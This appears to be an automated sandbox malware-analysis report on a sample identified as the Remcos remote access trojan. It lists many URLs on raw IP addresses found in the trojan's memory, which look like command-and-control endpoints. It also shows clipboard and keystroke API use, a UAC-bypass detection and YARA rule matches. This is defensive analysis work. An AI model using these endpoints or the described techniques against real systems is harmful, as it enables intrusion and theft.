              Source: alg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2789761856.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2768064977.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2839959599.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2751327328.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2734340919.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/vbfsvakjwax
              Source: alg.exe, 00000008.00000003.2914740529.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
              Source: alg.exe, 00000008.00000003.2935944224.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2953580866.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2913758256.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2931823808.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/fxeavmroscrKG
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/ioljnnvkrvc
              Source: alg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/udhgonlj7S
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/gxnuggiifqd
              Source: alg.exe, 00000008.00000003.2451615823.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/kaxtgyul
              Source: alg.exe, 00000008.00000003.2853288419.0000000000590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/
              Source: alg.exe, 00000008.00000003.2686547662.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2699036567.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/kitlgdtfGS
              Source: alg.exe, 00000008.00000003.2913758256.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2903231630.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2952832694.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2876522612.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/quoefwkpxb
              Source: alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/ylviltyasno
              Source: alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ayqsgvejwqqtuhlw
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ky
              Source: alg.exe, 00000008.00000003.3137092544.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3120974183.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/lyeldophhxwh
              Source: alg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/dgeuecvnet0-QoS
              Source: alg.exe, 00000008.00000003.2642728992.0000000000593000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/(
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/0eS0
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/1
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/fwbtaqdcjwd
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/h
              Source: alg.exe, 00000008.00000003.2316109693.0000000000530000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/hbkwpskje
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/hbkwpskje&
              Source: alg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2789761856.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2768064977.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2839959599.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2845735610.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2751327328.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/kjomliy
              Source: alg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2642728992.000000000057F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2659943434.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ktcaihfarwj=Thu
              Source: alg.exe, 00000008.00000003.2935944224.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2953580866.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2931823808.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ohyfmaqfmywges
              Source: alg.exe, 00000008.00000003.2723489835.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/vvlfkuqn
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/h
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1890513668.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2509496925.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
              Source: alg.exe, 00000008.00000003.1890190874.0000000000561000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1890513668.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/dqlfliuucamv
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/elpwpt
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/elpwptings7
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gtcagitskd5K
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ouftojymf
              Source: alg.exe, 00000008.00000003.2876522612.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/scdrs
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/t
              Source: alg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/elpwpt
              Source: alg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1913832298.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/hbj
              Source: alg.exe, 00000008.00000003.3120974183.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3114893360.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/yroespvujukavm
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2275600382.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2273228432.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2250681859.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2276387864.000000000057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/0
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/S
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ddsolxmfcvq
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2274545313.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eyywnnlobvqfg
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eyywnnlobvqfgs
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gs
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/iar
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ipnvn$
              Source: alg.exe, 00000008.00000003.2250815667.0000000000560000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2274270451.0000000000565000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2273228432.0000000000560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/liar
              Source: alg.exe, 00000008.00000003.2033350591.0000000000560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/w
              Source: alg.exe, 00000008.00000003.2033350591.0000000000560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/w.
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/ipnvn
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/liar
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/w
              Source: name.exe, 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: svchost.exe, 00000006.00000003.2218266234.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
              Source: svchost.exe, 00000006.00000003.2327106139.0000000004B90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
              Source: svchost.exe, 00000006.00000003.2328526659.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2328772433.0000000004B90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0045A10F
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_0045A10F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0046DCB4 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0046DCB4
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0047C81C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0047C81C
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR

              E-Banking Fraud

              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR

              System Summary

              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
